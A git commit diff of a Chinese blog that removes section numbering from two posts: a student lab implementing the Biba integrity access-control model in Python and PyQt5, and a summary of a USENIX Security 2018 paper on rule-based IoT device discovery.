Site updated: 2019-03-23 12:45:42

2019-03-23 12:45:48 +08:00 · 2019-03-23 12:45:48 +08:00 · a4b8d7d6dd
commit a4b8d7d6dd
parent 70cab5f5b9
7 changed files with 63 additions and 63 deletions
--- a/2018/11/16/BIBA访问控制模型实现(python)/index.html
+++ b/2018/11/16/BIBA访问控制模型实现(python)/index.html
@ -79,22 +79,22 @@
-<meta name="description" content="基于python语言的BIBA模型图形界面实现一、实验目的： 查阅资料，了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则 使用python语言实现，熟练pyqt的图形界面设计方法   二、实验环境： 操作系统：Windows10 工具版本：python3.7，pyqt5   三、实验原理：1. 什么是安全模型 系统的元素   具有行为能力的">
+<meta name="description" content="基于python语言的BIBA模型图形界面实现实验目的： 查阅资料，了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则 使用python语言实现，熟练pyqt的图形界面设计方法   实验环境： 操作系统：Windows10 工具版本：python3.7，pyqt5   实验原理：什么是安全模型 系统的元素   具有行为能力的主体不具有行为能力">
 <meta name="keywords" content="模型实现,python,访问控制">
 <meta property="og:type" content="article">
 <meta property="og:title" content="利用python实现BIBA模型">
 <meta property="og:url" content="https://cool-y.github.io/2018/11/16/BIBA访问控制模型实现(python)/index.html">
 <meta property="og:site_name" content="混元霹雳手">
-<meta property="og:description" content="基于python语言的BIBA模型图形界面实现一、实验目的： 查阅资料，了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则 使用python语言实现，熟练pyqt的图形界面设计方法   二、实验环境： 操作系统：Windows10 工具版本：python3.7，pyqt5   三、实验原理：1. 什么是安全模型 系统的元素   具有行为能力的">
+<meta property="og:description" content="基于python语言的BIBA模型图形界面实现实验目的： 查阅资料，了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则 使用python语言实现，熟练pyqt的图形界面设计方法   实验环境： 操作系统：Windows10 工具版本：python3.7，pyqt5   实验原理：什么是安全模型 系统的元素   具有行为能力的主体不具有行为能力">
 <meta property="og:locale" content="zh-Hans">
 <meta property="og:image" content="https://github.com/Cool-Y/BIBA-model/blob/master/img/login.PNG">
 <meta property="og:image" content="https://github.com/Cool-Y/BIBA-model/blob/master/img/rootUI.PNG">
 <meta property="og:image" content="https://github.com/Cool-Y/BIBA-model/blob/master/img/existUser.PNG">
 <meta property="og:image" content="https://github.com/Cool-Y/BIBA-model/blob/master/img/normal.PNG">
-<meta property="og:updated_time" content="2019-03-22T09:59:29.078Z">
+<meta property="og:updated_time" content="2019-03-23T04:45:31.936Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="利用python实现BIBA模型">
-<meta name="twitter:description" content="基于python语言的BIBA模型图形界面实现一、实验目的： 查阅资料，了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则 使用python语言实现，熟练pyqt的图形界面设计方法   二、实验环境： 操作系统：Windows10 工具版本：python3.7，pyqt5   三、实验原理：1. 什么是安全模型 系统的元素   具有行为能力的">
+<meta name="twitter:description" content="基于python语言的BIBA模型图形界面实现实验目的： 查阅资料，了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则 使用python语言实现，熟练pyqt的图形界面设计方法   实验环境： 操作系统：Windows10 工具版本：python3.7，pyqt5   实验原理：什么是安全模型 系统的元素   具有行为能力的主体不具有行为能力">
 <meta name="twitter:image" content="https://github.com/Cool-Y/BIBA-model/blob/master/img/login.PNG">
@ -437,18 +437,18 @@
-        <h1 id="基于python语言的BIBA模型图形界面实现"><a href="#基于python语言的BIBA模型图形界面实现" class="headerlink" title="基于python语言的BIBA模型图形界面实现"></a>基于python语言的BIBA模型图形界面实现</h1><h2 id="一、实验目的："><a href="#一、实验目的：" class="headerlink" title="一、实验目的："></a>一、实验目的：</h2><ol>
+        <h1 id="基于python语言的BIBA模型图形界面实现"><a href="#基于python语言的BIBA模型图形界面实现" class="headerlink" title="基于python语言的BIBA模型图形界面实现"></a>基于python语言的BIBA模型图形界面实现</h1><h2 id="实验目的："><a href="#实验目的：" class="headerlink" title="实验目的："></a>实验目的：</h2><ol>
 <li><strong>查阅资料，了解biba安全模型的相关知识</strong></li>
 <li><strong>通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则</strong></li>
 <li><strong>使用python语言实现，熟练pyqt的图形界面设计方法</strong></li>
 </ol>
 <hr>
-<h2 id="二、实验环境："><a href="#二、实验环境：" class="headerlink" title="二、实验环境："></a>二、实验环境：</h2><ul>
+<h2 id="实验环境："><a href="#实验环境：" class="headerlink" title="实验环境："></a>实验环境：</h2><ul>
 <li>操作系统：Windows10</li>
 <li>工具版本：python3.7，pyqt5</li>
 </ul>
 <hr>
-<h2 id="三、实验原理："><a href="#三、实验原理：" class="headerlink" title="三、实验原理："></a>三、实验原理：</h2><h4 id="1-什么是安全模型"><a href="#1-什么是安全模型" class="headerlink" title="1. 什么是安全模型"></a>1. 什么是安全模型</h4><ul>
+<h2 id="实验原理："><a href="#实验原理：" class="headerlink" title="实验原理："></a>实验原理：</h2><h4 id="什么是安全模型"><a href="#什么是安全模型" class="headerlink" title="什么是安全模型"></a>什么是安全模型</h4><ul>
 <li>系统的元素  <blockquote>
 <p>具有行为能力的主体<br>不具有行为能力的客体</p>
 </blockquote>
@ -465,7 +465,7 @@
 <li>模型往往用状态来表示<blockquote>
 <p>系统行为所依赖的环境<br>行为对系统产生的效果</p>
 </blockquote>
-<h4 id="2-biba完整性模型："><a href="#2-biba完整性模型：" class="headerlink" title="2. biba完整性模型："></a>2. biba完整性模型：</h4><ul>
+<h4 id="biba完整性模型："><a href="#biba完整性模型：" class="headerlink" title="biba完整性模型："></a>biba完整性模型：</h4><ul>
 <li>完整性威胁问题<blockquote>
 <p>完整性的威胁就是一个子系统在初始时刻认为不正常的修改行为；<br>来源：内部&amp;外部；<br>类型：直接&amp;间接</p>
 </blockquote>
@ -510,7 +510,7 @@
 </ul>
 <p><strong>一般都是指毕巴严格完整性模型，总结来说是上写、下读</strong></p>
 <hr>
-<h2 id="四、实验内容："><a href="#四、实验内容：" class="headerlink" title="四、实验内容："></a>四、实验内容：</h2><h3 id="1-用户登录实现"><a href="#1-用户登录实现" class="headerlink" title="1.  用户登录实现"></a>1.  用户登录实现</h3><p><strong>核对用户输入的账户密码与存储的是否匹配</strong></p>
+<h2 id="实验内容："><a href="#实验内容：" class="headerlink" title="实验内容："></a>实验内容：</h2><h3 id="用户登录实现"><a href="#用户登录实现" class="headerlink" title="用户登录实现"></a>用户登录实现</h3><p><strong>核对用户输入的账户密码与存储的是否匹配</strong></p>
 <p><img src="https://github.com/Cool-Y/BIBA-model/blob/master/img/login.PNG" alt="login"></p>
 <ul>
 <li>从用户输入框获取账户和密码</li>
@ -523,7 +523,7 @@
 </li>
 </ul>
 <hr>
-<h3 id="2-管理员功能实现"><a href="#2-管理员功能实现" class="headerlink" title="2.  管理员功能实现"></a>2.  管理员功能实现</h3><p><strong>管理员可以对用户进行增、删、查的操作</strong></p>
+<h3 id="管理员功能实现"><a href="#管理员功能实现" class="headerlink" title="管理员功能实现"></a>管理员功能实现</h3><p><strong>管理员可以对用户进行增、删、查的操作</strong></p>
 <p><img src="https://github.com/Cool-Y/BIBA-model/blob/master/img/rootUI.PNG" alt="login"></p>
 <h4 id="增加用户的实现"><a href="#增加用户的实现" class="headerlink" title="增加用户的实现"></a>增加用户的实现</h4><blockquote>
 <ul>
@ -544,7 +544,7 @@
 </blockquote>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">rmuser</span><span class="params">(self)</span>:</span></span><br><span class="line">      print(<span class="number">1</span>)</span><br><span class="line">      cur_path = os.getcwd()</span><br><span class="line">      filename = cur_path + <span class="string">'/etc/passwd.txt'</span></span><br><span class="line">      rmName = self.lineEdit.text()</span><br><span class="line">      <span class="keyword">with</span> open(filename, <span class="string">'r'</span>,encoding=<span class="string">"utf-8"</span>) <span class="keyword">as</span> r:</span><br><span class="line">          lines = r.readlines()</span><br><span class="line">          lenl = len(lines)</span><br><span class="line">      <span class="keyword">with</span> open(filename, <span class="string">'w'</span>,encoding=<span class="string">"utf-8"</span>) <span class="keyword">as</span> w:</span><br><span class="line">          <span class="keyword">for</span> line <span class="keyword">in</span> lines:</span><br><span class="line">              l = line.strip()</span><br><span class="line">              listFromLine = l.split(<span class="string">':'</span>)</span><br><span class="line">              <span class="keyword">if</span> rmName == listFromLine[<span class="number">0</span>]:</span><br><span class="line">                  print(<span class="string">'删除用户'</span> + rmName)</span><br><span class="line">                  <span class="keyword">continue</span></span><br><span class="line">              <span class="keyword">if</span> line == <span class="string">'\n'</span>:</span><br><span class="line">                  print(<span class="string">'find换行'</span>)</span><br><span class="line">                  line = <span class="string">''</span></span><br><span class="line">              w.write(line)</span><br></pre></td></tr></table></figure>
 <hr>
-<h3 id="3-普通用户功能实现"><a href="#3-普通用户功能实现" class="headerlink" title="3.  普通用户功能实现"></a>3.  普通用户功能实现</h3><p><strong>普通用户可以完成对合法权限文件的读取、增加内容（上写下读）以及创建文件的操作</strong></p>
+<h3 id="普通用户功能实现"><a href="#普通用户功能实现" class="headerlink" title="普通用户功能实现"></a>普通用户功能实现</h3><p><strong>普通用户可以完成对合法权限文件的读取、增加内容（上写下读）以及创建文件的操作</strong></p>
 <p><img src="https://github.com/Cool-Y/BIBA-model/blob/master/img/normal.PNG" alt="login"></p>
 <h4 id="读取文件内容"><a href="#读取文件内容" class="headerlink" title="读取文件内容"></a>读取文件内容</h4><blockquote>
 <p>双击文件名<br>获取选中文件和当前用户的完整性级别<br>如果用户的级别低于文件，则读取文件内容</p>
@ -559,7 +559,7 @@
 </blockquote>
   <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">touchfile</span><span class="params">(self)</span>:</span></span><br><span class="line">    urName = self.lineEdit.text()</span><br><span class="line">    filename = self.lineEdit_4.text()</span><br><span class="line">    cur_path = os.getcwd()</span><br><span class="line">    new_path = os.path.join(cur_path + <span class="string">'/file'</span>, urName)</span><br><span class="line">    print(urName)</span><br><span class="line">    <span class="keyword">if</span> os.path.exists(new_path) == <span class="literal">False</span>:</span><br><span class="line">        os.mkdir(new_path)</span><br><span class="line">    os.chdir(new_path)</span><br><span class="line">    fr = open(filename, <span class="string">'w'</span>)</span><br><span class="line">    key = (new_path + <span class="string">'/'</span> + filename).replace(<span class="string">'\\'</span>, <span class="string">'/'</span>)</span><br><span class="line">    fr.close()</span><br><span class="line">    os.chdir(cur_path)</span><br><span class="line">    fa = open(<span class="string">'./etc/ac.txt'</span>, <span class="string">'r'</span>)</span><br><span class="line">    a = fa.read()</span><br><span class="line">    <span class="keyword">if</span> a == <span class="string">''</span>:</span><br><span class="line">        dict = &#123;&#125;</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        dict = eval(a)</span><br><span class="line">    dict[key] = self.lineEdit_2.text()</span><br><span class="line">    fr = open(<span class="string">'./etc/ac.txt'</span>, <span class="string">'w'</span>)</span><br><span class="line">    fr.write(str(dict))</span><br><span class="line">    fr.close()</span><br><span class="line">    fa.close()</span><br></pre></td></tr></table></figure>
 <hr>
-<h2 id="五、心得体会："><a href="#五、心得体会：" class="headerlink" title="五、心得体会："></a>五、心得体会：</h2><h2 id="六、改进部分："><a href="#六、改进部分：" class="headerlink" title="六、改进部分："></a>六、改进部分：</h2>
+
    </div>
@ -803,7 +803,7 @@
-              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#基于python语言的BIBA模型图形界面实现"><span class="nav-number">1.</span> <span class="nav-text">基于python语言的BIBA模型图形界面实现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、实验目的："><span class="nav-number">1.1.</span> <span class="nav-text">一、实验目的：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、实验环境："><span class="nav-number">1.2.</span> <span class="nav-text">二、实验环境：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、实验原理："><span class="nav-number">1.3.</span> <span class="nav-text">三、实验原理：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-什么是安全模型"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">1. 什么是安全模型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-biba完整性模型："><span class="nav-number">1.3.0.2.</span> <span class="nav-text">2. biba完整性模型：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四、实验内容："><span class="nav-number">1.4.</span> <span class="nav-text">四、实验内容：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-用户登录实现"><span class="nav-number">1.4.1.</span> <span class="nav-text">1.  用户登录实现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-管理员功能实现"><span class="nav-number">1.4.2.</span> <span class="nav-text">2.  管理员功能实现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#增加用户的实现"><span class="nav-number">1.4.2.1.</span> <span class="nav-text">增加用户的实现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询已有用户的实现"><span class="nav-number">1.4.2.2.</span> <span class="nav-text">查询已有用户的实现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#删除用户的实现"><span class="nav-number">1.4.2.3.</span> <span class="nav-text">删除用户的实现</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-普通用户功能实现"><span class="nav-number">1.4.3.</span> <span class="nav-text">3.  普通用户功能实现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#读取文件内容"><span class="nav-number">1.4.3.1.</span> <span class="nav-text">读取文件内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#增加文件内容"><span class="nav-number">1.4.3.2.</span> <span class="nav-text">增加文件内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#创建文件"><span class="nav-number">1.4.3.3.</span> <span class="nav-text">创建文件</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、心得体会："><span class="nav-number">1.5.</span> <span class="nav-text">五、心得体会：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#六、改进部分："><span class="nav-number">1.6.</span> <span class="nav-text">六、改进部分：</span></a></li></ol></div>
+              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#基于python语言的BIBA模型图形界面实现"><span class="nav-number">1.</span> <span class="nav-text">基于python语言的BIBA模型图形界面实现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#实验目的："><span class="nav-number">1.1.</span> <span class="nav-text">实验目的：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实验环境："><span class="nav-number">1.2.</span> <span class="nav-text">实验环境：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实验原理："><span class="nav-number">1.3.</span> <span class="nav-text">实验原理：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#什么是安全模型"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">什么是安全模型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#biba完整性模型："><span class="nav-number">1.3.0.2.</span> <span class="nav-text">biba完整性模型：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实验内容："><span class="nav-number">1.4.</span> <span class="nav-text">实验内容：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#用户登录实现"><span class="nav-number">1.4.1.</span> <span class="nav-text">用户登录实现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#管理员功能实现"><span class="nav-number">1.4.2.</span> <span class="nav-text">管理员功能实现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#增加用户的实现"><span class="nav-number">1.4.2.1.</span> <span class="nav-text">增加用户的实现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询已有用户的实现"><span class="nav-number">1.4.2.2.</span> <span class="nav-text">查询已有用户的实现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#删除用户的实现"><span class="nav-number">1.4.2.3.</span> <span class="nav-text">删除用户的实现</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#普通用户功能实现"><span class="nav-number">1.4.3.</span> <span class="nav-text">普通用户功能实现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#读取文件内容"><span class="nav-number">1.4.3.1.</span> <span class="nav-text">读取文件内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#增加文件内容"><span class="nav-number">1.4.3.2.</span> <span class="nav-text">增加文件内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#创建文件"><span class="nav-number">1.4.3.3.</span> <span class="nav-text">创建文件</span></a></li></ol></li></ol></li></ol></div>
          </div>
--- a/2018/12/23/基于规则引擎发现IOT设备/index.html
+++ b/2018/12/23/基于规则引擎发现IOT设备/index.html
@ -79,23 +79,23 @@
-<meta name="description" content="论文来源：USENIX SECURITY 2018下载：原文pdf中文slides 论文解读1.    概要： 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。 物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模">
+<meta name="description" content="论文来源：USENIX SECURITY 2018下载：原文pdf中文slides 论文解读概要： 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。 物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模的自动设备发">
 <meta name="keywords" content="USENIX,数据挖掘,自然语言处理">
 <meta property="og:type" content="article">
 <meta property="og:title" content="Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices">
 <meta property="og:url" content="https://cool-y.github.io/2018/12/23/基于规则引擎发现IOT设备/index.html">
 <meta property="og:site_name" content="混元霹雳手">
-<meta property="og:description" content="论文来源：USENIX SECURITY 2018下载：原文pdf中文slides 论文解读1.    概要： 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。 物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模">
+<meta property="og:description" content="论文来源：USENIX SECURITY 2018下载：原文pdf中文slides 论文解读概要： 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。 物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模的自动设备发">
 <meta property="og:locale" content="zh-Hans">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313806/ARE/1.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/2.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/4.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313946/ARE/6.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313805/ARE/5.png">
-<meta property="og:updated_time" content="2019-03-23T04:22:28.568Z">
+<meta property="og:updated_time" content="2019-03-23T04:44:43.410Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices">
-<meta name="twitter:description" content="论文来源：USENIX SECURITY 2018下载：原文pdf中文slides 论文解读1.    概要： 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。 物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模">
+<meta name="twitter:description" content="论文来源：USENIX SECURITY 2018下载：原文pdf中文slides 论文解读概要： 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。 物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模的自动设备发">
 <meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313806/ARE/1.png">
@ -439,24 +439,24 @@
        <p><strong><em>论文来源：</em></strong>USENIX SECURITY 2018<br><strong><em>下载：</em></strong><br><a href="https://www.usenix.org/conference/usenixsecurity18/presentation/feng" target="_blank" rel="noopener">原文pdf</a><br><a href="https://res.cloudinary.com/dozyfkbg3/raw/upload/v1553314438/ARE/Rule-based_engine.pptx" target="_blank" rel="noopener">中文slides</a></p>
-<h2 id="论文解读"><a href="#论文解读" class="headerlink" title="论文解读"></a>论文解读</h2><h3 id="1-概要："><a href="#1-概要：" class="headerlink" title="1.    概要："></a>1.    概要：</h3><ul>
+<h2 id="论文解读"><a href="#论文解读" class="headerlink" title="论文解读"></a>论文解读</h2><h3 id="概要："><a href="#概要：" class="headerlink" title="概要："></a>概要：</h3><ul>
 <li>物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。</li>
 <li>物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模的自动设备发现和注释仍然是物联网中的一个悬而未决的问题。</li>
 <li>这篇文章提出了一种基于采集规则的引擎（ARE），它可以自动生成用于在没有任何训练数据的情况下发现和注释物联网设备的规则。ARE通过利用来自物联网设备的应用层响应数据和相关网站中的产品描述来构建设备规则，以进行设备注释。我们将事务定义为对产品描述的唯一响应之间的映射。</li>
 <li>为了收集交易集，ARE提取响应数据中的相关术语作为抓取网站的搜索查询。ARE使用关联算法以（类型，供应商和产品）的形式生成物联网设备注释的规则。我们进行实验和三个应用程序来验证ARE的有效性。</li>
 </ul>
-<h3 id="2-背景与动机："><a href="#2-背景与动机：" class="headerlink" title="2.    背景与动机："></a>2.    背景与动机：</h3><ul>
+<h3 id="背景与动机："><a href="#背景与动机：" class="headerlink" title="背景与动机："></a>背景与动机：</h3><ul>
 <li>物联网蓬勃发展，造就了物联网设备的广泛应用，它不仅种类繁多，包括摄像头、打印机、路由器、电视盒子、工控系统、医疗设备等，而且数量庞大，据统计，每天就会新增5500000台物联网设备。</li>
 <li>但是由于设备脆弱、缺乏管理和配置不当，物联网设备相比传统计算机要更不安全，比如之前爆发的Mirai僵尸网络，给美国造成了重大的损失。因此，为了更主动地保护IOT设备，提前发现、登记和注释物联网设备成为先决条件。</li>
 <li>设备注释的内容通常为“设备类型(e.g.,routers) + 供应商(e.g.,CISCO) + 产品型号(e.g.,TV-IP302P)”，传统生成设备注释的方法有基于指纹的，也有使用标志获取的，前者对数据集和大量设备模型的要求很高，而后者需要专业知识的人工方式，因此不可能用于大规模注释而且很难去维护更新。</li>
 </ul>
 <p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313806/ARE/1.png" alt></p>
 <p>所以，作者希望提出一种减少对数据集和人工依赖的注释方式。本文的方法主要基于两个事实，第一个Figure 1是制造商通常会将相关信息硬编码到IOT设备，第二个Figure 2是有许多网站（如产品测评）会描述设备产品。从第一个事实，我们可以从应用层数据包获取关键词，然后根据这些关键词依据第二个事实进行网页爬虫，以获取网页上的相关描述，然后对这些描述进行自然语言处理和数据挖掘，从而建立起基于规则的映射。</p>
-<h3 id="3-核心工作—Rule-Miner："><a href="#3-核心工作—Rule-Miner：" class="headerlink" title="3.    核心工作—Rule Miner："></a>3.    核心工作—Rule Miner：</h3><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/2.png" alt></p>
+<h3 id="核心工作—Rule-Miner："><a href="#核心工作—Rule-Miner：" class="headerlink" title="核心工作—Rule Miner："></a>核心工作—Rule Miner：</h3><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/2.png" alt></p>
 <p>  Rule Miner由三个部分构成，Transaction set是一对由应用层数据和相关网页组成的文本单元，它生成了一种规则： ，其中A是从应用层数据包中提取的一些特征，B是从相关网页抓取的设备描述；Device entity recognition结合了基于语料库的NER和基于规则的NER(命名实体识别)，前者解决了设备类型和供应商名，后者使用正则表达式识别出产品型号。但是由于一个不相干的网页也可能包含设备类型的关键词(如switch)，以及一个短语可能因为满足正则表达式而被认为是型号所以表现并不好，但好在实体与实体之间具有很高的依赖性，这三个元素常常一起出现。数据挖掘算法Apriori algorithm用于从Transaction中学习“关系”。</p>
-<h3 id="4-完整架构和应用"><a href="#4-完整架构和应用" class="headerlink" title="4.    完整架构和应用"></a>4.    完整架构和应用</h3><p> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/4.png" alt></p>
+<h3 id="完整架构和应用"><a href="#完整架构和应用" class="headerlink" title="完整架构和应用"></a>完整架构和应用</h3><p> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/4.png" alt></p>
 <p>完整的ARE除了核心Rule Miner之外，还有Transaction Collection用于收集响应数据和网络爬虫，Rule Library用于存储生成的规则，Planner用于更新规则。<br>作者主要将ARE应用于三个方面，一是互联网范围的设备测量统计，二是对受损设备进行检测，三是对易受攻击的设备进行分析。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313946/ARE/6.png" alt><br>之后对ARE的效果与Nmap进行比较和评估，从产生规则的数量、规则的准确率和覆盖率、动态学习规则的能力以及时间代价，ARE都要优于Nmap。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313805/ARE/5.png" alt></p>
-<h3 id="5-工作总结："><a href="#5-工作总结：" class="headerlink" title="5.    工作总结："></a>5.    工作总结：</h3><ul>
+<h3 id="工作总结："><a href="#工作总结：" class="headerlink" title="工作总结："></a>工作总结：</h3><ul>
 <li>提出ARE的框架：不需要数据集和人工干预，自动生成用于IOT设备识别的规则。</li>
 <li>实现了ARE的原型并评估了它的效果：ARE在一周内生成了大量的规则，而且IOT设备识别的细粒度超过现有工具。</li>
 <li>应用于三个场景中，主要发现有：大量IOT设备在互联网中可以抵达；成千上万的IOT设备易受攻击且暴露给了公众。</li>
@ -705,7 +705,7 @@
-              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#论文解读"><span class="nav-number">1.</span> <span class="nav-text">论文解读</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-概要："><span class="nav-number">1.1.</span> <span class="nav-text">1.    概要：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-背景与动机："><span class="nav-number">1.2.</span> <span class="nav-text">2.    背景与动机：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-核心工作—Rule-Miner："><span class="nav-number">1.3.</span> <span class="nav-text">3.    核心工作—Rule Miner：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-完整架构和应用"><span class="nav-number">1.4.</span> <span class="nav-text">4.    完整架构和应用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-工作总结："><span class="nav-number">1.5.</span> <span class="nav-text">5.    工作总结：</span></a></li></ol></li></ol></div>
+              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#论文解读"><span class="nav-number">1.</span> <span class="nav-text">论文解读</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概要："><span class="nav-number">1.1.</span> <span class="nav-text">概要：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#背景与动机："><span class="nav-number">1.2.</span> <span class="nav-text">背景与动机：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#核心工作—Rule-Miner："><span class="nav-number">1.3.</span> <span class="nav-text">核心工作—Rule Miner：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#完整架构和应用"><span class="nav-number">1.4.</span> <span class="nav-text">完整架构和应用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#工作总结："><span 